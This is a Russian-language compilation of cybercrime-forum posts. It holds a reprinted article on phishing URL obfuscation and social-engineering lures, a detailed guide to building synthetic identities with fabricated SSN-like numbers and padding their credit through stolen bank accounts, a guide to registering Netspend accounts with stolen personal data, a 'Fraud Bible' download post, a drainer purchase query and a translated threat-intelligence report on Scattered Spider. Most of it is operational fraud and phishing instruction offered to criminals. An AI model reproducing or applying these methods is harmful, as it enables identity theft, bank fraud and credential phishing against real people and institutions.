Добавим в зловредный URL немного кириллицы, закодированной в UTF-8 → HEX,
чтобы он выглядел непонятно для человека и на первый взгляд безопасно:
http://bank.ru@%D0%B7%D0%BB%D0%BE%D0%B9%D1%81%D0%B0%D0%B9%D1%82.%D1%80%D1%84
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2018%2F10%2F189769%2Fhex.png&hash=c35736153e1b5fd1bf261da6a97bb6d6)
Или совместим простые техники (редирект + кодирование):
http://www.moscow-bank.ru/bitrix/redirect.php?goto=http://www.moscow- bank.ru@%D0%B7%D0%BB%D0%BE%D0%B9%D1%81%D0%B0%D0%B9%D1%82.%D1%80%D1%84
При наведении мыши на закодированный URL десктопные браузеры декодируют
символы (чего не скажешь об Outlook и мобильных браузерах). Поэтому для
полного скрытия злого адреса можно прописать адрес сервера, на котором
расположен фишинговый сайт:
http://www.moscow-bank.ru/bitrix/redirect.php?goto=http://www.moscow- bank.ru@178.248.232.27
или просто
http://www.moscow-bank.ru@178.248.232.27
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2018%2F10%2F189769%2Fipservera.png&hash=1330ebe11fe6dabbe12d99e5db4de7d4)
Не забудь прикрутить к серверу HTTPS, чтобы браузер не ругался, но об этом
позже.
Переполнение предпросмотра
Наверняка ты уже знаешь, что настоящее расширение файлов можно спрятать,
используя ограничение отображаемой длины столбца extension в «Проводнике» или
архиваторе.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F189769%2Frararhiv.png&hash=920190348c85dcc988cfd446e727e793)
Теперь давай попробуем сходным образом скрыть злую часть URL на этапе предпросмотра в браузере.
Если сотрудник знает, что анкор ссылки может быть не равен целевому URL, то он наведет мышкой на ссылку и посмотрит, куда на самом деле она ведет. Если это его единственный способ проверки ссылок, то инструкции по безопасности в такой компании пора обновлять.
Злая ссылка может быть, к примеру, такой:
https://berbank.ru:ааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааа@zloysait.ru/bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb.html
Вместо aaaa и bbbb пишем разные ключевые слова, которые обычно используются на
оригинальном сайте.
При наведении мышкой в Firefox увидим сокращенный посередине адрес сайта, из-
за чего часть zloysait.ru не отображается. Видна только не вызывающая
подозрений часть ссылки:
https://berbank.ru:аааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааа...bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb.html
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2018%2F10%2F189769%2Fperepoln.png&hash=3882a3ba678dc922f45f3b9cb25dbeca)
Для больших экранов фишинговую ссылку лучше сделать подлиннее. Если навести мышку на такую ссылку в Internet Explorer или Edge, то мы не увидим вообще ничего. Судя по всему, их смущает повторное двоеточие в адресе, что нас вполне устраивает.
Chromium-браузеры от Google и Яндекса отображают конечный URL zloysait.ru/bbbbbbbb...bbbbbbbb.html, поэтому данный способ подойдет для таргетированной атаки, когда известен браузер жертвы.
«Почта России» тебе в помощь!
Если жертва занимает руководящую должность в целевой компании, можно
попробовать сыграть на ее чувстве собственной важности.
Создается фейковый одностраничник конференции (бизнес-мероприятия, бизнес- форума и подобного). Теперь жертву нужно заманить на ресурс. Почему бы не отправить бумажное письмо ей на работу? Тут ты точно обойдешь всю цифровую и железную защиту в организации и даже нейросетевой файрвол в виде секретарши, так как, по ее мнению, если она выкинет такое письмо в корзину, ее начальник не обрадуется. Очень уж привлекательно выглядит содержимое — красивое приглашение поучаствовать в пафосном мероприятии в качестве спикера (члена жюри, лауреата престижной премии).
Дальше все стандартно: предлагается скачать и заполнить «анкету» участника. Можно даже QR-код напечатать (вроде как заботимся о вашем удобстве, глубокоуважаемая жертва).
Личное или публичное?
Следующие несколько способов относятся к атакам на организацию через
использование фактов о личной жизни сотрудника. Рассказывая о защите от
социальной инженерии, я настаиваю на том, что человек должен знать правила
безопасности не ради организации, а в первую очередь для себя. Пока в
некоторых СБ думают, что принесенный на работу смартфон с пойманным на
выходных трояном нельзя использовать для прослушки внутриофисных событий, мы
будем находить таких сотрудников и делать их более компетентными.
Не чекином единым
Если ты тестируешь личный email сотрудника или его аккаунт в соцсетях, то
посмотри, где человек отдыхал в последнее время.
Видишь название отеля? Смело пиши от имени администрации отеля и требуй доплаты за сервис. В письмо добавь надпись, что данное сообщение сгенерировано автоматически, а для ответа нужно воспользоваться формой на официальном сайте в разделе поддержки клиентов. Дав фейковую ссылку, предложи ему зарегистрироваться. Кто знает, быть может, этот логин/email и пароль он использует и на других ресурсах.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F189769%2Fotel.jpg&hash=b178f11f706d43ffefe1335c18ccfe7f)
Потенциальная жертва летает самолетами «Аэрофлота»? Напиши, что срочно надо активировать бонусные мили, и тогда их количество удвоится! Сделать это нужно по твоей фейковой ссылке с лендингом акции.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F189769%2Faeroflot.jpg&hash=f095a576bf5f44447ac392b687d79d48)
Жертва недавно посетила какое-то мероприятие? Попроси ее зарегистрироваться по твоей ссылке, чтобы получить все записи с конференции + бонусный контент и скидку на участие в следующей!
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2018%2F10%2F189769%2Fconf.jpg&hash=299239fd047390e5e201b7d6b4a747ab)
Пост в соцсети, облегчающий жизнь пентестеру
Чтобы жертва ничего не заподозрила, после того как зарегистрировалась, ей можно показать сообщение об ошибке (например, «404. Ой, что-то пошло не так, попробуйте повторить ваш запрос позже!») или отправить на главную страницу сайта.
Примерно в таком ключе можно обращаться к человеку на основании свежих данных из его аккаунтов в соцсетях. Здесь мы использовали по большей части фишинговые методы, и нам этого достаточно, чтобы проверить бдительность сотрудника. Настоящие злодеи, конечно, на этом не остановятся и будут использовать уязвимости браузеров и вредоносные файлы для заражения устройства жертвы. Это уже техническая часть, а не социальная.
SMS-редирект
Наверняка ты уже слышал историю о том, что у Bitcoin-инвестора с подходящей
фамилией Терпин [украли 23 миллиона долларов](https://xakep.ru/2018/08/16/sim-
swap-lawsuit/) при помощи банального запроса о переносе номера мобильного на
новую SIM-карту. А что, если немного пофантазировать и посмотреть, как с
помощью фишинга получить доступ к интернет-сервисам сотрудника, защищенным
двухфакторной аутентификацией? Вдруг кто-то из сотовых операторов дает
возможность получить симку, не воруя номер?
Сотруднику на личный телефон (или корпоративный мобильный) отправляется SMS или email с призывом сделать что-то в его личном кабинете. Повод лучше выбрать страшный (из-за чего прямо сейчас нужно туда зайти) или надавить на жадность, чтобы не побуждать человека звонить в техподдержку. Нужно только знать, к какому оператору относится его номер, и дать подходящую фишинговую ссылку. После получения доступа в кабинет человек со злым умыслом ставит свой телефон для приема SMS в разделе «Переадресация сообщений».
У большинства операторов предоставляется на выбор множество сценариев по настройке редиректов.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2018%2F10%2F189769%2Fsms-
redirect.png&hash=f759735607cd7017d9b07b1ba06cb653)
Описание услуги на сайте сотового оператора
Один email — один банк
Если ты нашел на сайте какого-то крупного банка такую строчку:
src='//www.googletagmanager.com/gtm.js?id='
то представь следующий сценарий:
Google Tag Manager — сервис, который упрощает размещение на сайте информации,
в том числе JS-скриптов. Соответственно, если ты имеешь доступ к аккаунту, с
которого делаются настройки Tag Manager, ты можешь внедрить свой вредоносный
код на сайт.
Место для вставки вредоносного кода
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2018%2F10%2F189769%2Ftagman.png&hash=6a8a2ad809bae0ef924c98c0b138c6a8)
Маркетологам на заметку
Кстати, вот один из способов сфишить email маркетолога, отвечающего за сайт.
Если организация дает рекламу в AdWords, то возможен такой сценарий. Здесь:
https://ads.google.com/aw/preferences — пишем название фейкового аккаунта.
Что-то наподобие:
. . . . . . . . . . . . . . . . . . . . Для получения расширенной статистики по аккаунту такому-то подтвердите свое участие в Beta-тестировании: www.bad- ad-google.com
Указываем название аккаунта
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2018%2F10%2F189769%2Fgoog1.png&hash=5203923ac2bb26d4de4ff336ff286929)
Идем сюда: https://ads.google.com/aw/accountaccess/users — и пишем email получателя.
Выбираем уровень доступа
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2018%2F10%2F189769%2Fgoog2.png&hash=fc56c4f3a59feb4c8b0555c87b28ccc3)
Пользователю придет письмо от имени [ads-noreply@google.com](mailto:ads-
noreply@google.com). Пример сообщения от [ads-noreply@google.com](mailto:ads-
noreply@google.com)
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2018%2F10%2F189769%2Fgoog3.png&hash=4dd1b8d7bcb6367a46da412ca21d8365)
Дальше следует фишинговая форма авторизации, загрузка эксплоита и тому подобное.
В Google сказали: хоть социальная инженерия и зло, мы не уберем возможность отправки таких сообщений. Просто подкрутим, чтобы через эту форму было сложнее отправлять спам. Социальному инженеру этого достаточно, он ведь не спамер.
Бонус
Напоследок приведу несколько лайфхаков.
Вместо выводов
О технических средствах защиты от социальной инженерии ты наверняка знаешь
лучше меня. К сожалению, их недостаточно. Как говорил основатель Group-IB Илья
Сачков: «…какие бы ни были технологии… все становится бессмысленно, если
сотрудники открывают подозрительные файлы и кликают на фишинговые ссылки… и у
всех везде одинаковые пароли». Поэтому в следующий раз мы поговорим о том, как
обучать сотрудников не попадаться на уловки социальных инженеров.
автор Юрий Другач, взято с хакер.ру
I want to spoof with SIP over microsip, I have used "Twosip" recently but looking for alternative, do you know any?
Я хочу подделать SIP через Microsip. Недавно я использовал Twosip, но ищу альтернативу, знаете ли вы какую-нибудь?
Небольшой сборник паблик фишлетов, по которым можно сделать свои. Может кому и пригодится.
UPD По поводу создания фишлетов, наткнулся на замечательную статью от miserylord, по этому гайду действительно можно сделать рабочий фишлет: https://xss.is/threads/125261/
1. Что такое CPN (Credit Privacy Number - "Конфиденциальный номер кредита") или SCN (Secondary Credit Number - "Вторичный кредитный номер") ?
Это девятизначный идентификационный номер который может быть использован
вместо SSN (Social Security Number), и он не отличается от номера социального
страхования ни чем!
Некоторые Американцы используют CPN/SCN в целях скрытия своего номера
социального страхования, что не противоречит законам США, а именно закону о
конфиденциальности 1974 года раздел 5-ый, где говорится следующее -
"Вы имеете право сохранить ваш номер социального страхования в тайне и не быть
лишенным права на обслуживание из-за вашего отказа. Кредитные бюро не являются
государственными учреждениями, поэтому вы не обязаны предоставлять им свой
номер социального страхования."
CPN/SCN используется большинством американских знаменитостей, членами
конгресса и правительственными работниками в целях защиты SSN и от
отслеживания кредитных карт и других действий со стороны медиа.
2. Для каких целей могут быть использованы CPN/SCN ?
**CPN/SCN могут быть использованы для всего что может потребовать от вас
кредитную отчетность.
Имея CPN мы можем получить :
• Кредитные карты
• Займы на покупку автомобиля
• Займы для аренды дома/квартиры
• Paypal кредит (раньше работало 100%)
• Регистрация банковских аккаунтов
И многое другое …
Нельзя использовать для получения:
• Государственных Пособий (Пособия по безработице
• Государственные программы ( Продовольственные марки и тд.)
• Ипотека (Mortgage)
• Процентного дохода
Но мы с вами будем использовать CPN/SCN для создания саморегов ба, которые
точно не будут принадлежать кому либо, на примере этого вы научитесь создавать
cpn для любых ваших целей.
Бывают случаи когда нужно иметь данные владельца кх дабы создать саморег ба и
слить деньги, но ssn холдера не пробивается или кх имеет аккаунт на том же
банке, ситуации могут быть разными, в таких случаях многие не знают что
делать, но умея создать (Синтетическую личность) мы сможем подменить
владельца.**
Этап 1 - Создание синтетической личности
**
Что нужно для создания совершенно новую синтетическую личность?
Открываем любой текстовик и пишем следующую инфу! Можно сказать мы сами
создаём фулку! Советую вам использовать английский язык, так как будет легче
интуитивно запоминать и заполнять формы.
• Имя и Фамилия (First name, Last Name по желанию Middle Name) :
• CPN/SCN:
• Дата рождения (DOB - Date of Birth) : Советую придержаться возраста от 23 до
63
• Текущий статус занятости (Current Employment status)
Можем выбрать любой тип занятости, но избегайте выбирать типы занятости
которые могут быть связаны с малыми или крупными компаниями, так как компании
обобщают документы частным фирмам для проверки кредиторами трудовой стаж.
Придерживаемся типа занятости "Самозанятый или владелец собственного бизнеса и
придумываем название бизнесу, а так же можете указать что вы дизайнер,
программист и тд и запоминаем название бизнеса/предприятия так как в
дальнейшем вопросы касаемо работы будут в BG вопросах при регистрации ба
аккаунтов и в разных конторах. Погуглив “List of self employed jobs или
Best/Top Self employed jobs” можете увидеть разные списки типов работ
считающийся типично self-employed. Если создаваемый вами личность зрелый то
срок службы указываем 6 лет 3 месяцев, если молодой то 3 года и 3 месяца.
•Годовой доход (Anual Salary) : Будем указывать между ($55, 000 - $ 85, 000),
а еще лучше погуглить средний годовой доход выбранного вами штата и города.
Например можно вбить такой запрос:
Los Angeles, Ca median Household Income
• Аренда (Rent) - Стоимость арендной платы указываем не больше 20% от месячной
зарплаты.
• Address - по этому адресу будут приходить кредитные карты или дебетовые
карты и welcome set от банков после открытия чекинг аккаунта.
• Электронная почта - Email (Регистрируем в нормальных доменах)
• Телефонный Номер : Можем использовать Google Voice, или арендовать номер.
• Девичья фамилия матери или прабабушки (MMN) : Придумываем рандомно.
Создаём CPN/SCN:
CPN/SCN/SSN состоит из 9 чисел разделенные на три секции : XXX-XX-XXXX
• Первые Три числа : Число Региона/Штата
• Следующие Два : Групповой номер
• Последние Четыре : Серийный Номер
Отличный сайт для декодирования ssn номеров которого мы будем использовать :
stevemorse.org/ssn/ssn.html и так же socialsecuritynumerology.com/prefixes.php
Чтобы найти конкретные годы с 2003 по 2011 год - мы можем проверить тут :
www.ssa.gov/employer/ssnvhighgroup.html
Подробно об строении ssn можете прочитать по ссылке :
www.ssa.gov/history/ssn/geocard.html
Я для примера выбрал первые 5 цифр
245-99-XXXX Штат Северная Каролина (North Carolina , NC).
Нам нужно правильно подобрать оставшийся 4 цифры.
Скажем 245-99-5396
Переходим на сайт :
SSNVALIDATOR.com
Этот сайт нам поможет выяснить валидность номера и принадлежал ли выбранный
нами 9-значный номер мёртвому человеку ?
Этот сайт кроме этого ничего нам больше не сообщает.
Дальше переходим на сайт:
www.searchbug.com
Этот сайт нам нужен для того чтобы узнать статус использования выбранного нами
CPN номера,
Нам нужно зарегистрировать Бизнес аккаунт иначе не даст доступ к чекеру ssn,
после регистрации нужно будет ждать 24 часа чтобы аккаунт активировался,
первый поиск ssn бесплатный, для последующих нужно будет покупать токены
(внутреннюю валюту).
Но как выбрать номер который точно никому не принадлежит ?
Для этого есть простой фокус, найти "non issued" не выпушенные номера. На
примере номера "034" принадлежащий штату Массачусетс можете увидеть что
отсутствуют некоторые четные или нечётные групповые номера (034-02, 034-04 и
тд) они как раз нам подходят. Это конечно же не единственный штат или номер с
не выпушенными групповыми номерами.
Сайт : socialsecuritynumerology.com/prefixes.php
Переходим на сайт : stevemorse.org/ssn/ssn.html
И проверяем "034-02: Not Issued" Отлично, мы определились первыми 5-ю цифрами,
рандомно пишем остальные 4 цифры "034-02-2518" и наш CPN номер готов !
**
ЭТАП 2 - Подбираем существующий адрес
**Первый Важный шаг мы сделали, теперь нам нужен существующий адрес, дом со своим почтовым ящиком (не квартира и ничто иное а именно дом), туда будет приходить как раньше говорилось, кредитные/дебетовые карты и тд. Переходим на Zillow.com или Rencafe.com (или любой другой сайт объявлений о продаже/аренде квартир. раздел Rent и ищем дома которых сдают в штате и городе которых вы выбрали и копируем адрес выбранного вами дома в наш текстовик.
Дальше нам нужен номер телефона, можете использовать Google Voice, но я
рекомендую вам арендовать Esim.
Чтобы номер соответствовал городу и штату, гуглим "city, state area code" или
сразу переходим на сайт allareacodes.com и находим код города.
Фулка для нашей синтетической личности выглядит так.
Мы завершили первый и второй этапы !**
ЭТАП 3 - Создание Кредитного профиля
**TRI - MERGE (Тройное Слияние) - Этот термин обозначает объединение отчётов
трёх основных и больших кредитных бюро "Experian, Equifax, TransUnion" в один,
если коротко 3 в 1.
Все эти кредитные бюро (Experian, Equifax, TransUnion) являются отдельными
коммерческими агентствами, и они не делятся имеющейся информацией между собой
о потребителе за некоторыми исключениями, по этому каждый потребитель имеет
один отчёт и одну оценку от каждого кредитного бюро и они могут значительно
отличаться. Отчёт tri-merge даёт полное представление о кредитном профиле
потребителя а так же о рисках как заёмщика.
Наша цель индексировать нашу "Синтетическую личность" во всех кредитных бюро
"Большой тройки" и накрутить кредитную историю дабы сделать наш девятизначный
номер CPN/SCN рабочим.
Я создал 2 личности для мануала
Чтобы сравнить и выяснить кто быстрее передаёт информацию кредитным бюро. Для
первой личности оставил заявку на автозайм/автокредит на roadloans.com (старый
метод, работал лет 12 назад), а для второй личности оставил заявку на
кредитные карты.
Вы так же можете сделать это на :
DriveTime.com (старый не очень способ)
quickenloans.com (старый не очень способ)
bankofamerica.com/home-loans/mortgage/applying-for-mortgage-loan.go
А так же можете оставлять заявку на покупку или ремонт дома или на кредитную
карту.
Советую не оставлять больше 2 заявок !
Конечно же нам никто сразу не одобрит займ на авто и мы получим отказ, наша
цель была индексировать наш CPN под нашими данными в большой тройке. Я для
примера оставил заявку и на roadloans и capitalone но вам не нужно оставлять
заявку и том и в другом, в одном достаточно, после этого ждём от 1до 3 дней !
Отказы в наших рапортах будут в "Hard Inquiries" об этом чуть ниже.
После того как оставили заявки на кредитные карты или на автокредит можете
сразу а лучше спустя день перейти на сайт
https://www.optoutprescreen.com/
Кликаем по "CLICK HERE TO OPT-IN OR OPT-OUT"
На следующей странице выделяем OPT-IN и на Continue
Затем вводим данные нашей синтетической личности вводим капчу а затем нажимаем на Confirm
Этот шаг не обязателен но его лучше сделать, так мы сами даём добро на
использование и обработку наших данных фирмам и тд.
Через 1-3 дня переходим в один из сайтов ниже для мониторинга кредитного
профиля и регистрируемся.
Creditkarma.com
Creditsesame.com
Annualcreditreport.com
Credit.com
Wisepiggy.com
Bankrate.com
Lendingtree.com
Если вам не дало зарегистрироваться спустя 3-х дней, это означает что наши данные не попали к кредитным бюро. В моём примере могу сказать что для Bryan Davis спустя 3 дня не дало зарегистрироваться в creditkarma и в других, но я сделал еще один cpn 30 числа августа и оставил заявку на 4 кредитные карты "Amex BlueCash, Capitalone Venture, Discover Cashback и The Victoria Card от Victoria's Secret", данные индексировались в кредитных бюро в тот же день.
В итоге для Bryan Davis я оставил заявку на кредитную карту и утром следующего дня успешно создал аккаунт на Creditkarma, итог такой, кредитные бюро получают наши данные поздно если оставлять заявку на автокредит. И лучше всего оставлять заявки на кредитные карты от Capitalone, Discover, Amex, Citi Credit Cards.
А если после всех этих манипуляций не получилось зарегистрироваться спустя 3
дня это может означать одно, кто то уже пользуется вашим cpn номером.
После регистрации переходим на Overview/dashboard и видим наш credit score от
TransUnion и Equifax, он конечно же нулевой и мы скоро это исправим. После
переходим на Overview/Score details листаем вниз и видим наши "Hard Inquires",
это отказы на кредитные карты которые мы оставили и собственно видим кто
передал наши данные кредитным бюро.
Теперь можем быть уверены что наш cpn индексируется в "Большой тройке"
Для следующего шага нам нужны Ба аккаунты с зароленной кредитной картой, да те
логи с кредиткой о которых многие твердят что они бесполезны.
"В чём же фишка ?" - спросите вы.
Большинство банков позволяют своим клиентам добавлять авторизованного
пользователя к своим кредитным картам.
Что такое авторизованный пользователей "Authorized user или AU" ?
Это тот, кому разрешено использовать чужую кредитную карту. Авторизованному
пользователю может быть выдана собственная кредитная карта с его именем, но
счет принадлежит основному владельцу карты.
AU может потратить деньги со счета, но от него не требуется и не ожидается,
что он будет совершать платежи по кредитной карте, независимо от того сколько
он потратил. За платежи и изменения отвечает основной держатель карты.
А самое главное AU попадает в кредитные отчёты добавившего его человека и
таким образом мы очень быстро сможем накрутить кредит скор наших синтетических
личностей !
Нажимаем на "MORE", затем на "Account Services" и Add an Authorized User.
Открывается новая страница, тут мы пишем данные нашей синтетической личности,
город и штат ставится автоматически если написать zip номер. После того как
заполнили нужные поля нажимаем "Add Authorized User".
Для примера я выбрал лог Chase, но вы можете и будете использовать любой
другой ба аккаунт (есть некоторые бесполезные о них напишу ниже), но
обязательно после добавления проверяйте почту кх, так как есть банки которые
отправляют письмо, на примере банка Discover могу сказать точно, они
отправляют 2 письма, первая об успешном добавлении AU, а другая в духе
"недавно на вашу карту был добавлен AU. это были вы ?", так что всегда
проверяйте и удаляйте письма из почты. В других ба аккаунтах при добавлении AU
бывает строка " I know ssn for authorized user" ставим галочку и просто вводим
наш cpn. А так же могут спросить "отправить карту AU на ваш адрес или на адрес
AU, можете выбрать на адрес AU тогда карта не придёт на адрес Кх"
Credit Score вашей синтетической личности изменится не сразу, обращаем
внимание на Statement или Bill pay Day "Дата платежа по кредиту", Credit Score
обновится на следующий день после даты платежа по кредиту ! В моём случае
после 10 сентября.
Один из важных этапов при индексировании cpn это оставить заявку на кредит,
или кредитную карту в банке :
www.centralbank.net
Это единственный банк из множество который передаёт информацию о статусе
трудоустройства введенные вами в кредитные бюро а также в другие органы. При
заполнении формы для получения кредитных карт задают вопросы касаемо работы,
стаж и тд. Все эти вопросы будут заданы при создании саморегов как BG вопросы,
поэтому нужно записывать все ответы в блокнот.
Это можете сделать в любом порядке, ещё тогда когда только оставляете заявки
на кредитные карты или в конце когда cpn уже индексируется в кредитных
конторах!
Побольше профитов, господа!
Подписывайтесь, учитесь, растите, достигайте!**
Если кто-то проходил и может посоветовать, буду благодарен
**Доброго времени суток, господа. Сегодняшняя методичка посвящена простенькой регистрацииNetspend.
Spoiler: Регистрация в видео-формате
**
**
Перед регистрацией необходимо создать почтовый аккаунт, выбирайте outlook,
yahoo, mail.com и пробить номер телефона холдера из BG, воспользуйтесь
Truthfinder, Beenverifed, Intellius либо любой другой бесплатной альтернативой
вроде FamilyTreeNow.
(В дальнейшем вам не потребуется доступ к номеру, достаточно только почты.)
**
Начинаем регистрацию аккаунта, указываете данные из фуллки, затем задаёте логин и пароль.
**
После чего получаете AN+RN
RN 073972181 | Pathward Bank
Если кто-то не знает - это всё тот-же Metabank, не рекомендую использовать в
качестве приёмки DD, его рн в блеклисте у большинства контор.
Переходите в аккаунт, затем открываете меню управления картой и можете увидеть
вашу VCC, так-же отличительной особенностью Netspend является возможность
создания сразу нескольких виртуальных карт.
Бин 451311 (Debit, Classic)
VCC вполне сгодится под прогрев мерчей, привязку в PayPal и какие-то мелкие
покупки.
Побольше профитов, господа!
Подписывайтесь, учитесь, растите, достигайте!**
признаюсь не знаю что там
What is Fraud Bible?
A fraud bible is, simply put, a collection of techniques, hacks, and
instructions for committing fraud in a huge variety of ways. There is
information for people wanting to commit credit card fraud, identity theft,
wire fraud, BIN fraud, and everything else under the sun. There are even fraud
bibles out there that detail how to go about creating a completely new
identity for one’s self.
A typical table of contents might read as follows:
1. BINS and Levels and Banks
2. Bank Transfer 100_ Successful
3. Basic Carding for Noobs
4. Best Bins and Top Banks
5. Bypass PayPal login verification with 100% Working
6. Dark Web Browser & site Link
7. Quick Way To Card APPLE WITH EASE
8. Scammer & hacker tools and links
9. More…
Download link
Hidden content for authorized users.
](https://anonfiles.com/F3456392y0/Fraud_Bible_22_zip)
anonfiles.com
Thinking of buying the Zelos group Drainer/panel is anybody here making money from it?
Anybody?
На днях вышел[замечательный ресерч от ](https://blog.eclecticiq.com/ransomware-in-the-cloud-scattered-spider- targeting-insurance-and-financial- industries)[EclecticIQ](https://blog.eclecticiq.com/ransomware-in-the-cloud- scattered-spider-targeting-insurance-and-financial-industries) по тактикам наших зарубежных коллег. Думаю, что многим будет интересно с ним ознакомиться для саморазвития
Основные положения
Аналитики EclecticIQ провели глубокое исследование операций рансомварщиков с фокусом на облачную инфраструктуру страховых и финансовых секторов. Согласно анализу, наблюдаемая исследователями инфраструктура и методологии, включающие в себя автоматическое создание фишинговых страниц, полностью соответствуют кластеру деятельности SCATTERED SPIDER. [1]
SCATTERED SPIDER часто использует методы социальной инженерии с помощью устройств телефонии - такие как голосовой фишинг (вишинг) и фишинг текстовых сообщений (смишинг) для обмана и манипуляций со своими жертвами, нацеливаясь на службы ИТ-поддержки и администраторов с доступом к системам идентификации. Злоумышленник часто выдает себя за действующих сотрудников, чтобы завоевать доверие и получить доступ, а затем манипулировать настройками MFA и направлять жертв на поддельные порталы входа.
Члены SCATTERED SPIDER, вероятно, покупают украденные данные учеток, подменяют SIM-карты и используют инструменты для работы с облачными решениями, чтобы поддерживать постоянный доступ.
Аналитики заметили, что злоумышленники используют возможности облачной инфраструктуры для проведения вредоносных атак, что делает их операции более сложными для обнаружения и противодействия.
SCATTERED SPIDER демонстрирует глубокое понимание западных деловых практик благодаря своим преимущественно англоговорящим участникам. Аналитики EclecticIQ со средней уверенностью оценивают, что нахождение в той же культурной среде является одной из важнейших причин, по которой BlackCat/ALPHV [2] могли принять решение сотрудничать с ними. Это партнерство позволило группе BlackCat Ransomware более эффективно атаковать западные организации.
EclecticIQ подробно описали "жизненный цикл" или методы развертывания Ransomware в облачных средах, которые используются злоумышленниками для проникновения, выполнения и закрепления Ransomware, чтобы помочь защитникам (и вместе с ними и нам с вами). Доступность облачных решений открывают не только выгоду для бизнеса, но и новые возможности для финансово мотивированных киберпреступников, что и делает доступы к таким облачным решениям желаемой целью.
Рисунок 1 — Жизненный цикл развертывания программ-вымогателей в облачных
средах
От учетных записей пользователей до облачных инфраструктур
В период с 2023 по второй квартал 2024 года аналитики EclecticIQ отслеживали и анализировали кибератаки, нацеленные на учетные записи администраторов в облачных инфраструктурах. Результаты показывают, что SCATTERED SPIDER часто компрометирует корпоративные сети с помощью социальной инженерии против учетных записей пользователей облака. В следующих разделах будут подробно описаны различные методы и инструменты, используемые в этих атаках в реальных условиях.
Случайная утечка токена аутентификации в облаке
Случайная утечка учетных данных остается распространенным методом получения несанкционированного доступа к облачным средам. SCATTERED SPIDER использует утекшие токены аутентификации облака [3] из общедоступных репозиториев кода, таких как GitHub, где они могут быть жестко закодированны в коде самого приложения. Это позволяет злоумышленникам использовать автоматизированные инструменты для сканирования и получения несанкционированного доступа к облачным системам.
Рисунок 2 – Пример утечки токена AWS в GitHub
Фишинговые и смишинговые кампании на облачные сервисы и учетные записи с высокими привилегиями
Аналитики EclecticIQ с высокой степенью уверенности полагают, что SCATTERED SPIDER использует фишинговые кампании для компрометации учетных записей пользователей с высокими привилегиями, таких как администраторы служб технической поддержки и специалистов по кибербезопасности. [4] Эти атаки направлены на облачные сервисы, такие как Microsoft Entra ID и AWS EC2. Кроме того, злоумышленники атакуют такие SaaS-платформы как Okta, ServiceNow, Zendesk и VMware Workspace ONE, развертывая фишинговые страницы, которые очень похожи на порталы единого входа (SSO).
SCATTERED SPIDER использует методы SMS-фишинга (смишинга) через текстовые сообщения. Смишинг - это форма фишинга, которая реализуется через доставку SMS с вредоносными ссылками, эта тактика стала излюбленной у киберпреступных групп из-за возможности обходить традиционные спам-фильтры для электронной почты и напрямую атаковать пользователей на их мобильных устройствах. Эти кампании в первую очередь нацелены на такие секторы как финансовые услуги и страховые компании.
Рисунок 3 – Опечаточный домен и фишинг против сервиса финансовых услуг из
США.
Атаки Smishing нацелены на учетный записи администраторов в облачных инфраструктурах, предлагая им ввести свои учетные данные для VMware Workspace ONE - платформы, критически важной для управления приложениями и политиками доступа. Кампании Smishing обычно обманывают жертву с помощью SMS-сообщений, вынуждая нажимать на ссылки, которые ведут на фишинговые веб-сайты для кражи учетных данных для входа и перехват одноразовых паролей (OTP). Это позволяет злоумышленникам получить несанкционированный доступ даже к тем учетным записям, что защищены многофакторной аутентификацией (MFA).
Аналитики EclecticIQ отметили, что на фишинговых страницах запрашивались также идентификаторы сотрудника, имена их руководителей - для использования этих данных в дальнейших атаках социальной инженерии, чтобы успешно выдать себя затем за сотрудников организации во время голосовых фишинговых звонков.
Рисунок 4 – График с платформы для анализа угроз от EclecticIQ показывает
инфраструктуру, которая начинается с HTML-шаблона для фишинга
Аналитики EclecticIQ заметили, что для фишинга SCATTERED SPIDER в основном используют домены верхнего уровня (TLD) .com и .net, часто генерируя их с опечатками от реальных доменных имен организаций.
Эти домены обычно включают такие строки, как «ServiceNow», «hr», «corp», «dev», «okta», «sso» и «workspace». Аналитики EclecticIQ оценивают со средней уверенностью, что SCATTERED SPIDER недавно изменил свою тактику, чтобы избежать раскрытия, перейдя с таких регистраторов как Porkbun и NAMECHEAP к регистратору registrar[.]eu.
Стилеры и брокеры начальных доступов
Аналитики EclecticIQ заметили продажу токенов аутентификации и учетных данных пользователей для облачных платформ, таких как AWS, Azure и GCP, на русскоязычных и англоязычных подпольных форумах.
Рисунок 5 – Токены AWS продаются на подпольных форумах.
SCATTERED SPIDER использует такие стилеры учетных данных, как Stealc, Raccoon Stealer, Vidar Stealer и RedLine Stealer, в своих операциях. Это вредоносное ПО собирает токены аутентификации к облачным сервисам, которые затем продаются на подпольных форумах, включая, помимо прочих, RussianMarket и XSS. Полученные токены предоставляют злоумышленникам беспрепятственный доступ к облачным ресурсам, минуя традиционную аутентификацию.
Рисунок 6 – Брокер начального доступа nightly делится
снимком экрана с Entra ID жертвы на подпольном форуме
Стилер Stealc infostealer позволяет искать данные из каталогов . aws и . azure в конечных точках Windows, которые обычно содержат файлы конфигурации и учетные данные для доступа к этим облачным службам.
